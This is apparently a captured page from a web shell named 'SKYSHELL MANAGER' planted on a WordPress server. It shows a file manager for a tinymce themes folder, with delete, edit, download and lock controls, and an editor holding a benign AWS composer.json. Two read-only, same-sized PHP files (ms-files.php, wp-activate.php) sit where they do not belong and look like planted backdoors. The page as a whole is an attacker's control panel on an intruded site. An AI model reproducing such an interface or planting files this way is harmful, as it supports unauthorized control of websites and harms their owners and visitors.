📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: composer.json
{ "name": "aws/aws-crt-php", "homepage": "http://aws.amazon.com/sdkforphp", "description": "AWS Common Runtime for PHP", "keywords": ["aws","amazon","sdk","crt"], "type": "library", "authors": [ { "name": "AWS SDK Common Runtime Team", "email": "aws-sdk-common-runtime@amazon.com" } ], "config": { "platform": {"php": "5.6"} }, "minimum-stability": "alpha", "require": { "php": ">=5.5" }, "require-dev": { "phpunit/phpunit":"^4.8.35|^5.4.3" }, "autoload": { "classmap": [ "src/" ] }, "scripts": { "test": "./run_tests", "test-extension": "@test", "test-win": "run_tests" }, "license": "Apache-2.0" }
Save